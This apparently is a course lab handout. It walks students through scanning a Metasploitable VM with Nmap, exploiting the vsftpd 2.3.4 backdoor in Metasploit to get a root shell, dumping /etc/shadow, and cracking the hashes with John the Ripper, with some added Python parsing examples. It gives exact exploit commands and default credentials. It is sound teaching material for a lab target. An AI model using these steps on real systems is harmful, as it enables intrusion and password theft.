Lab 6.1. Nmap: Tutorial 6 Vulnerability Scanning & Exploitation


Tutorial 6

Vulnerability Scanning & Exploitation


Purpose
On finishing the tutorials, students are expected to:
- Be able to work with different distros of Linux
- Be able to scan & analyze vulnerabilities
- Be able to exploit vulnerabilities
- Be able to crack password hashes using different techniques
Main activities
- Scanning for vulnerabilities using Nmap
- Exploiting the target using Metasploit
- Cracking password hashes using John the Ripper

Lab 6.1. Nmap


Nmap ("Network Mapper") is a free and open source utility for network
discovery and security auditing. Nmap uses raw IP packets in novel ways to
determine what hosts are available on the network, what services (application
name and version) those hosts are offering, what operating systems (and OS
versions) they are running, what type of packet filters/firewalls are in use, and
dozens of other characteristics. It was designed to rapidly scan large networks, but
works fine against single hosts. Nmap runs on all major computer operating
systems, and official binary packages are available for Linux, Windows, and Mac
OS X. In addition to the classic command-line Nmap executable, the Nmap suite
includes an advanced GUI and results viewer (Zenmap), a flexible data transfer,
redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff),
and a packet generation and response analysis tool (Nping).
1. Launch nmap in Kali
Go to Applications -> 2. Vulnerability Analysis -> nmap
2. Launch the scan using the command nmap -vv -A x.x.x.x
Where x.x.x.x is the IP of the Metasploitable machine.
3. After the scan finishes, you may find some vulnerabilities on this host such
as: XSS, FTP anonymous login, vsftpd 2.3.4.

NSE TUTORIAL 6 |Instructor: Nhung Vuong Thi 1


4. In this tutorial, we will exploit the vulnerability in vsftpd 2.3.4, a release that
contains a backdoor.
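The analysis in step 3 can be automated: the following added example (not part of the original lab) parses nmap XML output (nmap -oX) and flags the two findings the lab names, an FTP service identified as vsftpd 2.3.4 and an ftp-anon script hit. The XML below is a constructed sample, not real scan data; the flagged-version table is a placeholder you would extend for your own environment.

```python
import xml.etree.ElementTree as ET

# Constructed sample of nmap -A -oX output (not a real scan): one host with
# FTP identified as vsftpd 2.3.4 and an ftp-anon script result.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -vv -A -oX - 10.0.2.15">
  <host>
    <address addr="10.0.2.15" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open" reason="syn-ack"/>
        <service name="ftp" product="vsftpd" version="2.3.4" method="probed" conf="10"/>
        <script id="ftp-anon" output="Anonymous FTP login allowed (FTP code 230)"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="23">
        <state state="closed" reason="reset"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# (product, version) pairs to flag; vsftpd 2.3.4 is the one this lab discusses.
FLAGGED_VERSIONS = {("vsftpd", "2.3.4"): "vsftpd 2.3.4 (backdoored release)"}

def triage_nmap_xml(xml_text):
    """Return (host, port, finding) tuples for open services that need follow-up."""
    findings = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue  # only open ports carry service/script data worth triaging
            portid = int(port.get("portid"))
            svc = port.find("service")
            if svc is not None:
                key = (svc.get("product", "").lower(), svc.get("version", ""))
                if key in FLAGGED_VERSIONS:
                    findings.append((addr, portid, FLAGGED_VERSIONS[key]))
            for script in port.iter("script"):
                if script.get("id") == "ftp-anon" and "allowed" in script.get("output", ""):
                    findings.append((addr, portid, "FTP anonymous login allowed"))
    return findings

if __name__ == "__main__":
    for host, port, finding in triage_nmap_xml(SAMPLE_NMAP_XML):
        print(f"{host}:{port}  {finding}")
```

Run your real scan with -oX and feed the file contents to triage_nmap_xml to get the same report for the Metasploitable host.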

Lab 6.2. Using the Metasploit Framework


In this lab you will be using MSF to exploit the vsftpd 2.3.4 backdoor vulnerability.
This vulnerability enables an attacker to remotely execute code without restriction.
This can allow an attacker to have access to the “keys to the kingdom,” the
password hashes, which can later be cracked and then used to gain full access to
the system and network.
Lab Steps
Step 1: Log on to both the Kali and Metasploitable 2 PCs.
To log on to the Kali PC, follow these steps:
1. At the login prompt, type root and press ENTER.
2. At the password prompt, type toor or yourpassword and press ENTER.
To log on to Metasploitable 2, follow these steps:
1. At the login prompt, type msfadmin and press ENTER.
2. At the password prompt, type msfadmin and press ENTER.
Step 2: Launch Attack at Kali
1. Click the Terminal icon.
2. In the Terminal window, type msfconsole and press ENTER
3. At the msf prompt, type help and press ENTER.
This displays the commands that can be used in the Metasploit console.
a. What command displays modules of a given type?
b. What command allows you to assign a value to a variable?
c. What command selects a module by name?
4. In the Metasploit console, type search vsftpd and press ENTER.
You should see the exploit for the vsftpd vulnerability loaded.
a. What is the exact name of the exploit?
5. In the Metasploit console, type use exploit/unix/ftp/vsftpd_234_backdoor
and press ENTER.
The Metasploit console will display a new prompt with the name of the exploit in
red. If that does not happen, then you may have typed or pasted the command incorrectly.
6. Type show options and press ENTER.
Note you will need to set the remote host (RHOST), which is the IP address of the
target machine. In this case, it's Metasploitable. You will set the remote port
(RPORT), which is port 21 for FTP. You will also set the local host (LHOST), i.e. the
Kali machine, which is not listed in the options.
7. At the command prompt, do the following:
a. Type set RHOST 10.0.2.15 and press ENTER.
b. Type set RPORT 21 and press ENTER.
c. Type set LHOST 10.0.2.4 and press ENTER.
Next you will deliver a payload. Exploits can have different payloads. To see what
payloads are available for this exploit, do the following:
d. Type show payloads and press ENTER.
There is only one payload available, and it is labeled cmd/unix/interact. This will
allow you to interact with the remote machine without having to log in.
8. In the Metasploit console, type set PAYLOAD cmd/unix/interact and press
ENTER.
Step 3: Run the exploit.
You are now ready to run the exploit.
1. In the Metasploit console, type exploit and press ENTER.
If it worked properly, you will see the following:
[+] Backdoor service has been spawned, handling…
[+] uid=0(root) gid=0(root)
This means you have a back door into Metasploitable, and you are in as the root
user. Let's type a few commands and see what we can do.
2. At the prompt, type whoami and press ENTER.
a. Who are you?
3. At the prompt, type pwd and press ENTER.
a. Where are you in the directory structure of Metasploitable?
Let’s grab some password hashes so that we try to crack passwords in a later lab.
4. Type cat /etc/shadow and press ENTER.
5. Copy the content
6. Create a new text document using a text editor or nano.
7. Name the document MetaHashes.txt and press ENTER.
8. Right-click the text document and select Open With | Leafpad or any text
editor that you have.
9. Paste the text into the text document.
10. Close the document and save the changes.
We have successfully connected to the machine via a back door and exfiltrated
the hashes for cracking passwords. You can do just about anything with and to
this machine. You might add users or delete files, clear logs, and so on. For now,
what we have will do.

Lab 6.3: Password Cracking


John the Ripper is a password-cracking tool that is capable of performing a
dictionary, hybrid, or brute-force attack. There are also versions that can perform
a distributed attack. You will use John the Ripper to attempt to recover the
passwords from the hashes you captured.
1. In Kali, click the Terminal icon at the top.
2. At the command prompt, type man john and press ENTER.
This will access the manual for John the Ripper.
a. What is the command to see already cracked passwords?
b. What is the command to restore an interrupted session?
c. Press q to exit the manual.
On the desktop you should have a file called MetaHashes.txt. These are the
hashes for passwords on the Metasploitable machine. It is a dump of the
/etc/shadow file. Let’s view the hashes.
3. In a Terminal window, type nano /root/Desktop/MetaHashes.txt and press
ENTER.
a. How many password hashes do you see in the list? (Don't count the usernames with
*; use only the ones that have the long hash values.)
4. Press CTRL-X to exit nano.
5. Type john --test >/root/Desktop/johntest.txt and press ENTER.
This command sends the output to a text file so you can view it later. It will take a
few minutes to complete. When it is done, right-click the file on the desktop and
open it with Leafpad. This will allow you to scroll up and down. The output will
show you the number of crypts per second (c/s).
a. How many raw crypts per second will your machine do for FreeBSD MD5? Be
sure to multiply the number by the K, which represents the number 1,024.
6. Close Leafpad.
Now you will run John the Ripper with just the password file. The password file is
in the /usr/share/john directory. Take a look at the password file that comes with
John the Ripper. The command less will show you the contents of a file one page
at a time. You can use the SPACEBAR or the cursor keys to move forward through
the file.
7. At the command line, type cd /usr/share/john and press ENTER.
8. At the command line, type less password.lst and press ENTER.
a. Look through the list.
b. Do you see any passwords that are on the Linux server?
c. Do you see any passwords that you have used before on other computers?
9. To close the less utility, type q.
10. To use only the dictionary to attack the hashes, type the following:
john --wordlist=password.lst /root/Desktop/MetaHashes.txt
a. How many password hashes were loaded?
b. What type of hash did it detect? (It should be one of the hashing methods
listed in the test done earlier.)
c. How many passwords did it find?
d. How long did it take?
Now try a hybrid attack and see what you find. To do that, you need to add the
--rules option.
You first have to delete the john.pot file. That file contains the passwords found.
11. At the command line, type rm /root/.john/john.pot and press ENTER.
Note that the discovered passwords go into a hidden directory, .john, in the /root
folder. (If the file or directory does not exist, no cracked passwords have been stored
there yet, so there is nothing to delete.)
12. Type john --wordlist:password.lst --rules /root/Desktop/MetaHashes.txt
and press ENTER.
a. How many passwords did it find?
b. How long did it take?
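The questions in steps 3 and 10 (how many hashes are loaded, which hash type John detects) and the hybrid attack in step 12 can be reasoned about directly from the shadow file. The following added example (written for this edit, not the lab's own code) parses /etc/shadow-format lines, skips locked accounts (* or !), identifies the hash algorithm from its modular-crypt prefix, and shows a small subset of the mangling that a --rules hybrid run applies to each wordlist entry. The shadow lines are a constructed sample with fake hash strings, not a dump from any machine.

```python
# Constructed /etc/shadow-style sample (fake hash strings, not a real dump).
# Fields: name:hash:lastchg:min:max:warn:inactive:expire:reserved
SAMPLE_SHADOW = """\
root:$1$abcdefgh$FAKEHASHFAKEHASHFAKEHASH12:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$ijklmnop$FAKEHASHFAKEHASHFAKEHASH34:14742:0:99999:7:::
sshd:!:14684:0:99999:7:::
msfadmin:$6$qrstuvwx$FAKEHASHFAKEHASHFAKEHASH56:14684:0:99999:7:::
"""

# Modular-crypt prefixes and the hash type John reports for them.
HASH_TYPES = {
    "$1$": "md5crypt (FreeBSD MD5)",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}

def crackable_entries(shadow_text):
    """Return (user, hash, type) for accounts that carry a real hash.

    Locked or disabled accounts ('*', '!' or an empty field) are skipped, which
    is the same filtering the lab asks you to do by hand when counting hashes.
    """
    entries = []
    for line in shadow_text.splitlines():
        if not line.strip():
            continue
        user, pw_hash = line.split(":")[:2]
        if not pw_hash or pw_hash[0] in "*!":
            continue
        if not pw_hash.startswith("$"):
            hash_type = "descrypt (traditional DES, 13 chars)"
        else:
            hash_type = HASH_TYPES.get(pw_hash[:3], "unknown")
        entries.append((user, pw_hash, hash_type))
    return entries

def hybrid_candidates(word):
    """A small subset of the mangling rules a hybrid (--rules) run derives from one word."""
    cands = {word, word.capitalize(), word.upper(), word[::-1]}
    cands.update(word + str(d) for d in range(10))   # append a single digit
    cands.update({word + "!", word + "123"})          # common suffixes
    return sorted(cands)

if __name__ == "__main__":
    for user, _, hash_type in crackable_entries(SAMPLE_SHADOW):
        print(f"{user}: {hash_type}")
    print(hybrid_candidates("msfadmin"))
```

Anything reported as md5crypt or descrypt is a legacy algorithm that John cracks far faster than sha512crypt or yescrypt, which is why the hash type in step 10b matters for the defender as much as for the attacker.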
Now you will launch a combination attack. You will do a dictionary, hybrid, and
brute-force attack. This is John the Ripper’s default attack, so you will use no
switches.
13. At the command line, type rm /root/.john/john.pot and press ENTER.
14. Type john /root/Desktop/MetaHashes.txt and press ENTER. While John the
Ripper is running, you can press ENTER, and John the Ripper will report how
many guesses, how much time has passed since it started, and the number of
crypts per second. It will also show where it is in the brute-force process. Let John
the Ripper run for about ten minutes to see whether it finds any more passwords.
a. To see how long John the Ripper has been running and the calculations per
second it has processed, press ENTER.
b. How many passwords did John the Ripper find at the end of ten minutes?
15. To stop John the Ripper, press ctrl-c.
16. Open a terminal and try to telnet to the victim: telnet 10.0.2.7
Enter msfadmin as the username with password msfadmin.
17. Now you are logged in as a legitimate user.
